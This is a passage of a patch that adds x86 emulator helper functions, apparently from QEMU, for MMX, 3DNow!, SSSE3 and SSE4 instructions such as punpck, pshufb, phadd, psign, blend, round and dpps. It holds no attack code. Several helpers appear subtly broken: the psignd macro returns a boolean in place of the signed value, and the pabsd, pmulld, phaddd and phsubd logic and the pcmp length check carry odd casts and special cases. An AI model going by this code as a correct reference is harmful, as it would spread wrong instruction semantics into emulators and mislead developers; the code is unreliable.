SUFFIX)(CPUX86State *env,\ + Reg *d, Reg *s) \ + { \ + Reg r; \ + \ + r.B(0) = d->B((base << (SHIFT + 2)) + 0); \ + r.B(1) = s->B((base << (SHIFT + 2)) + 0); \ + r.B(2) = d->B((base << (SHIFT + 2)) + 1); \ + r.B(3) = s->B((base << (SHIFT + 2)) + 1); \ + r.B(4) = d->B((base << (SHIFT + 2)) + 2); \ + r.B(5) = s->B((base << (SHIFT + 2)) + 2); \ + r.B(6) = d->B((base << (SHIFT + 2)) + 3); \ + r.B(7) = s->B((base << (SHIFT + 2)) + 3); \ + XMM_ONLY( \ + r.B(8) = d->B((base << (SHIFT + 2)) + 4); \ + r.B(9) = s->B((base << (SHIFT + 2)) + 4); \ + r.B(10) = d->B((base << (SHIFT + 2)) + 5); \ + r.B(11) = s->B((base << (SHIFT + 2)) + 5); \ + r.B(12) = d->B((base << (SHIFT + 2)) + 6); \ + r.B(13) = s->B((base << (SHIFT + 2)) + 6); \ + r.B(14) = d->B((base << (SHIFT + 2)) + 7); \ + r.B(15) = s->B((base << (SHIFT + 2)) + 7); \ + ) \ + *d = r; \ + } \ + \ + void glue(helper_punpck ## base_name ## wd, SUFFIX)(CPUX86State *env,\ + Reg *d, Reg *s) \ + { \ + Reg r; \ + \ + r.W(0) = d->W((base << (SHIFT + 1)) + 0); \ + r.W(1) = s->W((base << (SHIFT + 1)) + 0); \ + r.W(2) = d->W((base << (SHIFT + 1)) + 1); \ + r.W(3) = s->W((base << (SHIFT + 1)) + 1); \ + XMM_ONLY( \ + r.W(4) = d->W((base << (SHIFT + 1)) + 2); \ + r.W(5) = s->W((base << (SHIFT + 1)) + 2); \ + r.W(6) = d->W((base << (SHIFT + 1)) + 3); \ + r.W(7) = s->W((base << (SHIFT + 1)) + 3); \ + ) \ + *d = r; \ + } \ + \ + void glue(helper_punpck ## base_name ## dq, SUFFIX)(CPUX86State *env,\ + Reg *d, Reg *s) \ + { \ + Reg r; \ + \ + r.L(0) = d->L((base << SHIFT) + 0); \ + r.L(1) = s->L((base << SHIFT) + 0); \ + XMM_ONLY( \ + r.L(2) = d->L((base << SHIFT) + 1); \ + r.L(3) = s->L((base << SHIFT) + 1); \ + ) \ + *d = r; \ + } \ + \ + XMM_ONLY( \ + void glue(helper_punpck ## base_name ## qdq, SUFFIX)(CPUX86State \ + *env, \ + Reg *d, \ + Reg *s) \ + { \ + Reg r; \ + \ + r.Q(0) = d->Q(base); \ + r.Q(1) = s->Q(base); \ + *d = r; \ + } \ + ) + +UNPCK_OP(l, 0) +UNPCK_OP(h, 1) + +/* 3DNow! float ops */ +#if SHIFT == 0 +void helper_pi2fd(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = int32_to_float32(s->MMX_L(0), &env->mmx_status); + d->MMX_S(1) = int32_to_float32(s->MMX_L(1), &env->mmx_status); +} + +void helper_pi2fw(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = int32_to_float32((int16_t)s->MMX_W(0), &env->mmx_status); + d->MMX_S(1) = int32_to_float32((int16_t)s->MMX_W(2), &env->mmx_status); +} + +void helper_pf2id(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_to_int32_round_to_zero(s->MMX_S(0), &env->mmx_status); + d->MMX_L(1) = float32_to_int32_round_to_zero(s->MMX_S(1), &env->mmx_status); +} + +void helper_pf2iw(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = satsw(float32_to_int32_round_to_zero(s->MMX_S(0), + &env->mmx_status)); + d->MMX_L(1) = satsw(float32_to_int32_round_to_zero(s->MMX_S(1), + &env->mmx_status)); +} + +void helper_pfacc(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_S(0) = float32_add(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); + r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); + *d = r; +} + +void helper_pfadd(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_add(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_add(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); +} + +void helper_pfcmpeq(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_eq_quiet(d->MMX_S(0), s->MMX_S(0), + &env->mmx_status) ? -1 : 0; + d->MMX_L(1) = float32_eq_quiet(d->MMX_S(1), s->MMX_S(1), + &env->mmx_status) ? -1 : 0; +} + +void helper_pfcmpge(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_le(s->MMX_S(0), d->MMX_S(0), + &env->mmx_status) ? -1 : 0; + d->MMX_L(1) = float32_le(s->MMX_S(1), d->MMX_S(1), + &env->mmx_status) ? -1 : 0; +} + +void helper_pfcmpgt(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(0) = float32_lt(s->MMX_S(0), d->MMX_S(0), + &env->mmx_status) ? -1 : 0; + d->MMX_L(1) = float32_lt(s->MMX_S(1), d->MMX_S(1), + &env->mmx_status) ? -1 : 0; +} + +void helper_pfmax(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + if (float32_lt(d->MMX_S(0), s->MMX_S(0), &env->mmx_status)) { + d->MMX_S(0) = s->MMX_S(0); + } + if (float32_lt(d->MMX_S(1), s->MMX_S(1), &env->mmx_status)) { + d->MMX_S(1) = s->MMX_S(1); + } +} + +void helper_pfmin(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + if (float32_lt(s->MMX_S(0), d->MMX_S(0), &env->mmx_status)) { + d->MMX_S(0) = s->MMX_S(0); + } + if (float32_lt(s->MMX_S(1), d->MMX_S(1), &env->mmx_status)) { + d->MMX_S(1) = s->MMX_S(1); + } +} + +void helper_pfmul(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_mul(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_mul(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); +} + +void helper_pfnacc(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); + r.MMX_S(1) = float32_sub(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); + *d = r; +} + +void helper_pfpnacc(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); + r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); + *d = r; +} + +void helper_pfrcp(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_div(float32_one, s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = d->MMX_S(0); +} + +void helper_pfrsqrt(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_L(1) = s->MMX_L(0) & 0x7fffffff; + d->MMX_S(1) = float32_div(float32_one, + float32_sqrt(d->MMX_S(1), &env->mmx_status), + &env->mmx_status); + d->MMX_L(1) |= s->MMX_L(0) & 0x80000000; + d->MMX_L(0) = d->MMX_L(1); +} + +void helper_pfsub(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_sub(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_sub(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); +} + +void helper_pfsubr(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + d->MMX_S(0) = float32_sub(s->MMX_S(0), d->MMX_S(0), &env->mmx_status); + d->MMX_S(1) = float32_sub(s->MMX_S(1), d->MMX_S(1), &env->mmx_status); +} + +void helper_pswapd(CPUX86State *env, MMXReg *d, MMXReg *s) +{ + MMXReg r; + + r.MMX_L(0) = s->MMX_L(1); + r.MMX_L(1) = s->MMX_L(0); + *d = r; +} +#endif + +/* SSSE3 op helpers */ +void glue(helper_pshufb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg r; + + for (i = 0; i < (8 << SHIFT); i++) { + r.B(i) = (s->B(i) & 0x80) ? 0 : (d->B(s->B(i) & ((8 << SHIFT) - 1))); + } + + *d = r; +} + +void glue(helper_phaddw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = (int16_t)d->W(0) + (int16_t)d->W(1); + d->W(1) = (int16_t)d->W(2) + (int16_t)d->W(3); + XMM_ONLY(d->W(2) = (int16_t)d->W(4) + (int16_t)d->W(5)); + XMM_ONLY(d->W(3) = (int16_t)d->W(6) + (int16_t)d->W(7)); + d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) + (int16_t)s->W(1); + d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) + (int16_t)s->W(3); + XMM_ONLY(d->W(6) = (int16_t)s->W(4) + (int16_t)s->W(5)); + XMM_ONLY(d->W(7) = (int16_t)s->W(6) + (int16_t)s->W(7)); +} + +void glue(helper_phaddd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->L(0) = (int64_t)d->L(0) + (int32_t)d->L(1); + XMM_ONLY(d->L(1) = (int32_t)d->L(2) + (int32_t)d->L(3)); + d->L((1 << SHIFT) + 0) = (uint32_t)((int32_t)s->L(0) + (uint32_t)s->L(1)); + XMM_ONLY(d->L(3) = (int32_t)s->L(2) + (int32_t)s->L(3)); +} + +void glue(helper_phaddsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satsw((int16_t)d->W(0) + (int16_t)d->W(1)); + d->W(1) = satsw((int16_t)d->W(2) + (int16_t)d->W(3)); + XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) + (int16_t)d->W(5))); + XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) + (int16_t)d->W(7))); + d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) + (int16_t)s->W(1)); + d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) + (int16_t)s->W(3)); + XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) + (int16_t)s->W(5))); + XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) + (int16_t)s->W(7))); +} + +void glue(helper_pmaddubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satsw((int8_t)s->B(0) * (uint8_t)d->B(0) + + (int8_t)s->B(1) * (uint8_t)d->B(1)); + d->W(1) = satsw((int8_t)s->B(2) * (uint8_t)d->B(2) + + (int8_t)s->B(3) * (uint8_t)d->B(3)); + d->W(2) = satsw((int8_t)s->B(4) * (uint8_t)d->B(4) + + (int8_t)s->B(5) * (uint8_t)d->B(5)); + d->W(3) = satsw((int8_t)s->B(6) * (uint8_t)d->B(6) + + (int8_t)s->B(7) * (uint8_t)d->B(7)); +#if SHIFT == 1 + d->W(4) = satsw((int8_t)s->B(8) * (uint8_t)d->B(8) + + (int8_t)s->B(9) * (uint8_t)d->B(9)); + d->W(5) = satsw((int8_t)s->B(10) * (uint8_t)d->B(10) + + (int8_t)s->B(11) * (uint8_t)d->B(11)); + d->W(6) = satsw((int8_t)s->B(12) * (uint8_t)d->B(12) + + (int8_t)s->B(13) * (uint8_t)d->B(13)); + d->W(7) = satsw((int8_t)s->B(14) * (uint8_t)d->B(14) + + (int8_t)s->B(15) * (uint8_t)d->B(15)); +#endif +} + +void glue(helper_phsubw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = (int16_t)d->W(0) - (int16_t)d->W(1); + d->W(1) = (int16_t)d->W(2) - (int16_t)d->W(3); + XMM_ONLY(d->W(2) = (int16_t)d->W(4) - (int16_t)d->W(5)); + XMM_ONLY(d->W(3) = (int16_t)d->W(6) - (int16_t)d->W(7)); + d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) - (int16_t)s->W(1); + d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) - (int16_t)s->W(3); + XMM_ONLY(d->W(6) = (int16_t)s->W(4) - (int16_t)s->W(5)); + XMM_ONLY(d->W(7) = (int16_t)s->W(6) - (int16_t)s->W(7)); +} + +void glue(helper_phsubd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->L(0) = (int32_t)((int64_t)d->L(0) - (int64_t)d->L(1)); + XMM_ONLY(d->L(1) = (int32_t)((int64_t)d->L(2) - (int64_t)d->L(3))); + d->L((1 << SHIFT) + 0) = (uint32_t)((int64_t)s->L(0) - (int64_t)s->L(1)); + XMM_ONLY(d->L(3) = (int32_t)s->L(2) - (int32_t)s->L(3)); +} + +void glue(helper_phsubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satsw((int16_t)d->W(0) - (int16_t)d->W(1)); + d->W(1) = satsw((int16_t)d->W(2) - (int16_t)d->W(3)); + XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) - (int16_t)d->W(5))); + XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) - (int16_t)d->W(7))); + d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) - (int16_t)s->W(1)); + d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) - (int16_t)s->W(3)); + XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) - (int16_t)s->W(5))); + XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) - (int16_t)s->W(7))); +} + +#define FABSB(_, x) (x > INT8_MAX ? -(int8_t)x : x) +#define FABSW(_, x) (x > INT16_MAX ? -(int16_t)x : x) +#define FABSL(_, x) ((x > INT32_MAX && x != 0x80000000) ? -(int32_t)x : x) +SSE_HELPER_B(helper_pabsb, FABSB) +SSE_HELPER_W(helper_pabsw, FABSW) +SSE_HELPER_L(helper_pabsd, FABSL) + +#define FMULHRSW(d, s) (((int16_t) d * (int16_t)s + 0x4000) >> 15) +SSE_HELPER_W(helper_pmulhrsw, FMULHRSW) + +#define FSIGNB(d, s) (s <= INT8_MAX ? s ? d : 0 : -(int8_t)d) +#define FSIGNW(d, s) (s <= INT16_MAX ? s ? d : 0 : -(int16_t)d) +#define FSIGNL(d, s) (s <= INT32_MAX ? s ? d && d != 0x80000000 : 0 : -(int32_t)d) +SSE_HELPER_B(helper_psignb, FSIGNB) +SSE_HELPER_W(helper_psignw, FSIGNW) +SSE_HELPER_L(helper_psignd, FSIGNL) + +void glue(helper_palignr, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + int32_t shift) +{ + Reg r; + + /* XXX could be checked during translation */ + if (shift >= (16 << SHIFT)) { + r.Q(0) = 0; + XMM_ONLY(r.Q(1) = 0); + } else { + shift <<= 3; +#define SHR(v, i) (i < 64 && i > -64 ? i > 0 ? v >> (i) : (v << -(i)) : 0) +#if SHIFT == 0 + r.Q(0) = SHR(s->Q(0), shift - 0) | + SHR(d->Q(0), shift - 64); +#else + r.Q(0) = SHR(s->Q(0), shift - 0) | + SHR(s->Q(1), shift - 64) | + SHR(d->Q(0), shift - 128) | + SHR(d->Q(1), shift - 192); + r.Q(1) = SHR(s->Q(0), shift + 64) | + SHR(s->Q(1), shift - 0) | + SHR(d->Q(0), shift - 64) | + SHR(d->Q(1), shift - 128); +#endif +#undef SHR + } + + *d = r; +} + +#define XMM0 (env->xmm_regs[0]) + +#if SHIFT == 1 +#define SSE_HELPER_V(name, elem, num, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->elem(0) = F(d->elem(0), s->elem(0), XMM0.elem(0)); \ + d->elem(1) = F(d->elem(1), s->elem(1), XMM0.elem(1)); \ + if (num > 2) { \ + d->elem(2) = F(d->elem(2), s->elem(2), XMM0.elem(2)); \ + d->elem(3) = F(d->elem(3), s->elem(3), XMM0.elem(3)); \ + if (num > 4) { \ + d->elem(4) = F(d->elem(4), s->elem(4), XMM0.elem(4)); \ + d->elem(5) = F(d->elem(5), s->elem(5), XMM0.elem(5)); \ + d->elem(6) = F(d->elem(6), s->elem(6), XMM0.elem(6)); \ + d->elem(7) = F(d->elem(7), s->elem(7), XMM0.elem(7)); \ + if (num > 8) { \ + d->elem(8) = F(d->elem(8), s->elem(8), XMM0.elem(8)); \ + d->elem(9) = F(d->elem(9), s->elem(9), XMM0.elem(9)); \ + d->elem(10) = F(d->elem(10), s->elem(10), XMM0.elem(10)); \ + d->elem(11) = F(d->elem(11), s->elem(11), XMM0.elem(11)); \ + d->elem(12) = F(d->elem(12), s->elem(12), XMM0.elem(12)); \ + d->elem(13) = F(d->elem(13), s->elem(13), XMM0.elem(13)); \ + d->elem(14) = F(d->elem(14), s->elem(14), XMM0.elem(14)); \ + d->elem(15) = F(d->elem(15), s->elem(15), XMM0.elem(15)); \ + } \ + } \ + } \ + } + +#define SSE_HELPER_I(name, elem, num, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t imm) \ + { \ + d->elem(0) = F(d->elem(0), s->elem(0), ((imm >> 0) & 1)); \ + d->elem(1) = F(d->elem(1), s->elem(1), ((imm >> 1) & 1)); \ + if (num > 2) { \ + d->elem(2) = F(d->elem(2), s->elem(2), ((imm >> 2) & 1)); \ + d->elem(3) = F(d->elem(3), s->elem(3), ((imm >> 3) & 1)); \ + if (num > 4) { \ + d->elem(4) = F(d->elem(4), s->elem(4), ((imm >> 4) & 1)); \ + d->elem(5) = F(d->elem(5), s->elem(5), ((imm >> 5) & 1)); \ + d->elem(6) = F(d->elem(6), s->elem(6), ((imm >> 6) & 1)); \ + d->elem(7) = F(d->elem(7), s->elem(7), ((imm >> 7) & 1)); \ + if (num > 8) { \ + d->elem(8) = F(d->elem(8), s->elem(8), ((imm >> 8) & 1)); \ + d->elem(9) = F(d->elem(9), s->elem(9), ((imm >> 9) & 1)); \ + d->elem(10) = F(d->elem(10), s->elem(10), \ + ((imm >> 10) & 1)); \ + d->elem(11) = F(d->elem(11), s->elem(11), \ + ((imm >> 11) & 1)); \ + d->elem(12) = F(d->elem(12), s->elem(12), \ + ((imm >> 12) & 1)); \ + d->elem(13) = F(d->elem(13), s->elem(13), \ + ((imm >> 13) & 1)); \ + d->elem(14) = F(d->elem(14), s->elem(14), \ + ((imm >> 14) & 1)); \ + d->elem(15) = F(d->elem(15), s->elem(15), \ + ((imm >> 15) & 1)); \ + } \ + } \ + } \ + } + +/* SSE4.1 op helpers */ +#define FBLENDVB(d, s, m) ((m & 0x80) ? s : d) +#define FBLENDVPS(d, s, m) ((m & 0x80000000) ? s : d) +#define FBLENDVPD(d, s, m) ((m & 0x8000000000000000LL) ? s : d) +SSE_HELPER_V(helper_pblendvb, B, 16, FBLENDVB) +SSE_HELPER_V(helper_blendvps, L, 4, FBLENDVPS) +SSE_HELPER_V(helper_blendvpd, Q, 2, FBLENDVPD) + +void glue(helper_ptest, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + uint64_t zf = (s->Q(0) & d->Q(0)) | (s->Q(1) & d->Q(1)); + uint64_t cf = (s->Q(0) & ~d->Q(0)) | (s->Q(1) & ~d->Q(1)); + + CC_SRC = (zf ? 0 : CC_Z) | (cf ? 0 : CC_C); +} + +#define SSE_HELPER_F(name, elem, num, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->elem(0) = F(0); \ + d->elem(1) = F(1); \ + if (num > 2) { \ + d->elem(2) = F(2); \ + d->elem(3) = F(3); \ + if (num > 4) { \ + d->elem(4) = F(4); \ + d->elem(5) = F(5); \ + d->elem(6) = F(6); \ + d->elem(7) = F(7); \ + } \ + } \ + } + +SSE_HELPER_F(helper_pmovsxbw, W, 8, (int8_t) s->B) +SSE_HELPER_F(helper_pmovsxbd, L, 4, (int8_t) s->B) +SSE_HELPER_F(helper_pmovsxbq, Q, 2, (int8_t) s->B) +SSE_HELPER_F(helper_pmovsxwd, L, 4, (int16_t) s->W) +SSE_HELPER_F(helper_pmovsxwq, Q, 2, (int16_t) s->W) +SSE_HELPER_F(helper_pmovsxdq, Q, 2, (int32_t) s->L) +SSE_HELPER_F(helper_pmovzxbw, W, 8, s->B) +SSE_HELPER_F(helper_pmovzxbd, L, 4, s->B) +SSE_HELPER_F(helper_pmovzxbq, Q, 2, s->B) +SSE_HELPER_F(helper_pmovzxwd, L, 4, s->W) +SSE_HELPER_F(helper_pmovzxwq, Q, 2, s->W) +SSE_HELPER_F(helper_pmovzxdq, Q, 2, s->L) + +void glue(helper_pmuldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->Q(0) = (int64_t)(int32_t) d->L(0) * (int32_t) s->L(0); + d->Q(1) = (int64_t)(int32_t) d->L(2) * (int32_t) s->L(2); +} + +#define FCMPEQQ(d, s) (d == s ? -1 : 0) +SSE_HELPER_Q(helper_pcmpeqq, FCMPEQQ) + +void glue(helper_packusdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->W(0) = satuw((int32_t) d->L(0)); + d->W(1) = satuw((int32_t) d->L(1)); + d->W(2) = satuw((int32_t) d->L(2)); + d->W(3) = satuw((int32_t) d->L(3)); + d->W(4) = satuw((int32_t) s->L(0)); + d->W(5) = satuw((int32_t) s->L(1)); + d->W(6) = satuw((int32_t) s->L(2)); + d->W(7) = satuw((int32_t) s->L(3)); +} + +#define FMINSB(d, s) MIN((int8_t)d, (int8_t)s) +#define FMINSD(d, s) MIN((int32_t)d, (int32_t)s) +#define FMAXSB(d, s) MAX((int8_t)d, (int8_t)s) +#define FMAXSD(d, s) MAX((int32_t)d, (int32_t)s) +SSE_HELPER_B(helper_pminsb, FMINSB) +SSE_HELPER_L(helper_pminsd, FMINSD) +SSE_HELPER_W(helper_pminuw, MIN) +SSE_HELPER_L(helper_pminud, MIN) +SSE_HELPER_B(helper_pmaxsb, FMAXSB) +SSE_HELPER_L(helper_pmaxsd, FMAXSD) +SSE_HELPER_W(helper_pmaxuw, MAX) +SSE_HELPER_L(helper_pmaxud, MAX) + +#define FMULLD(d, s) ((int64_t)d * (int32_t)s) +SSE_HELPER_L(helper_pmulld, FMULLD) + +void glue(helper_phminposuw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int idx = 0; + + if (s->W(1) < s->W(idx)) { + idx = 1; + } + if (s->W(2) < s->W(idx)) { + idx = 2; + } + if (s->W(3) < s->W(idx)) { + idx = 3; + } + if (s->W(4) < s->W(idx)) { + idx = 4; + } + if (s->W(5) < s->W(idx)) { + idx = 5; + } + if (s->W(6) < s->W(idx)) { + idx = 6; + } + if (s->W(7) < s->W(idx)) { + idx = 7; + } + + d->Q(1) = 0; + d->L(1) = 0; + d->W(1) = idx; + d->W(0) = s->W(idx); +} + +void glue(helper_roundps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_S(0) = float32_round_to_int(s->XMM_S(0), &env->sse_status); + d->XMM_S(1) = float32_round_to_int(s->XMM_S(1), &env->sse_status); + d->XMM_S(2) = float32_round_to_int(s->XMM_S(2), &env->sse_status); + d->XMM_S(3) = float32_round_to_int(s->XMM_S(3), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +void glue(helper_roundpd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_D(0) = float64_round_to_int(s->XMM_D(0), &env->sse_status); + d->XMM_D(1) = float64_round_to_int(s->XMM_D(1), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +void glue(helper_roundss, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_S(0) = float32_round_to_int(s->XMM_S(0), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +void glue(helper_roundsd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_D(0) = float64_round_to_int(s->XMM_D(0), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +#define FBLENDP(d, s, m) (m ? s : d) +SSE_HELPER_I(helper_blendps, L, 4, FBLENDP) +SSE_HELPER_I(helper_blendpd, Q, 2, FBLENDP) +SSE_HELPER_I(helper_pblendw, W, 8, FBLENDP) + +void glue(helper_dpps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) +{ + float32 iresult = float32_zero; + + if (mask & (1 << 4)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(0), s->XMM_S(0), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 5)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(1), s->XMM_S(1), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 6)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(2), s->XMM_S(2), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 7)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(3), s->XMM_S(3), + &env->sse_status), + &env->sse_status); + } + d->XMM_S(0) = (mask & (1 << 0)) ? iresult : float32_zero; + d->XMM_S(1) = (mask & (1 << 1)) ? iresult : float32_zero; + d->XMM_S(2) = (mask & (1 << 2)) ? iresult : float32_zero; + d->XMM_S(3) = (mask & (1 << 3)) ? iresult : float32_zero; +} + +void glue(helper_dppd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) +{ + float64 iresult = float64_zero; + + if (mask & (1 << 4)) { + iresult = float64_add(iresult, + float64_mul(d->XMM_D(0), s->XMM_D(0), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 5)) { + iresult = float64_add(iresult, + float64_mul(d->XMM_D(1), s->XMM_D(1), + &env->sse_status), + &env->sse_status); + } + d->XMM_D(0) = (mask & (1 << 0)) ? iresult : float64_zero; + d->XMM_D(1) = (mask & (1 << 1)) ? iresult : float64_zero; +} + +void glue(helper_mpsadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t offset) +{ + int s0 = (offset & 3) << 2; + int d0 = (offset & 4) << 0; + int i; + Reg r; + + for (i = 0; i < 8; i++, d0++) { + r.W(i) = 0; + r.W(i) += abs1(d->B(d0 + 0) - s->B(s0 + 0)); + r.W(i) += abs1(d->B(d0 + 1) - s->B(s0 + 1)); + r.W(i) += abs1(d->B(d0 + 2) - s->B(s0 + 2)); + r.W(i) += abs1(d->B(d0 + 3) - s->B(s0 + 3)); + } + + *d = r; +} + +/* SSE4.2 op helpers */ +#define FCMPGTQ(d, s) ((int64_t)d > (int64_t)s ? -1 : 0) +SSE_HELPER_Q(helper_pcmpgtq, FCMPGTQ) + +static inline int pcmp_elen(CPUX86State *env, int reg, uint32_t ctrl) +{ + unsigned int val; + + /* Presence of REX.W is indicated by a bit higher than 7 set */ + if (ctrl >> 8) { + val = abs1((int)env->regs[reg]); + } else { + val = abs1((int32_t)env->regs[reg]); + } + + if (ctrl & 1) { + if (val > 8) { + return 8; + } + } else { + if (val > 16) { + return 16; + } + } + if (val == 0x80000000) { + val = 0; + } + return val; +} + +static inline int pcmp_ilen(Reg *r, uint8_t ctrl) +{ + int val = 0; + + if (ctrl & 1) { + while (val < 8 && r->W(val)) { + val++; + } + } else { + while (val < 16 && r->B(val)) { + val++; + } + } + + return val; +} + 